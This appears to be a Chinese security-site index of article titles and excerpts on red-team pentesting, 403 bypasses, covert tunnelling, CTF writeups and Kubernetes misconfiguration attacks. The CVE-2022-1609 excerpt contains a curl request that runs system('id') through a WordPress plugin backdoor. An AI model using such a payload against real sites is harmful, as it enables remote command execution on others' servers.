curl -s URL | grep -Po "(/)((?:[a-zA-Z-_:.0-9{}]+))(/)*((?:[a-zA-Z-_:.0-9{}]+))(/)((?:[a-zA-Z-_/:.0-...
红队渗透私人手册
作者:Acklee 转载于:https://github.com/Acklee/PentestHandBook 私人手册 仅供参考(不定时更新) 形而上学 动作越少痕迹越少 渗透过程中不要让目标的机器...
20个403 bypass技巧
在Web渗透测试中,403 Forbidden状态码如同一位沉默的守卫,常常让安全人员陷入困境。这个状态码表明服务器已理解请求,但拒绝执行。本文将从底层协议原理出发,结合攻防对抗案例,系统梳理20种经...
记一次Linux(被黑客)入侵......
0x00 背景周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。 不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对...
《内网安全攻防渗透测试实战指南》笔记之隐藏通信隧道技术(上)(文末下载电子版)
《内网安全攻防渗透测试实战指南》学习笔记整理,快速掌握内网渗透的关键知识点:隐藏通信隧道基础知识 隐藏通信隧道概述 (在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连...
通信隧道技术
首先先了解一下,什么是隧道?这里的隧道,是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后通过防火墙,与之进行通信。当被封装的数据包到达目的地时,将数据包...
2022第二届网刃杯writeup
点击上方蓝字,关注我们吧!前言 平台体验感极差,py选手一大把;过程神似DAS,垂直上分真可怕。#WEB#Sign_in打开网页:<?php highlight_file(__FI...
看雪2022 KCTF 春季赛 | 第四题设计思路及解析
看雪 2022 KCTF春季赛 于5月10日中午12点正式开赛!第四题《飞蛾扑火》经过两天的激烈pk,于今日中午12点截止答题,经统计,本题围观人数2573人,共计19支战队成功破解。【mininep...
CVE-2022-1609 WordPress Weblizar后门
$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'...
K8S常见组件配置不当利用记录
文章首发于:火线Zone社区(https://zone.huoxian.cn/)渗透测试中的k8s各个组件未鉴权情况下如何利用都是需要去熟知的,这篇附上常见组件未授权或配置不当情况下如何攻击利用。组件...
SickOs 1.2(超详细教学)
靶机地址:https://www.vulnhub.com/entry/sickos-12,144/一、主机发现使用arp-scan -l查找靶机ip地址靶机ip地址为192.168.55.146攻击机...
RockyLinux9.5下使用ollama搭建本地AI大模型DeepSeek
RockyLinux9.5下使用ollama搭建本地AI大模型DeepSeek一、安装ollama Linux版本https://ollama.com/download/linux可以使用一键安装脚本...
27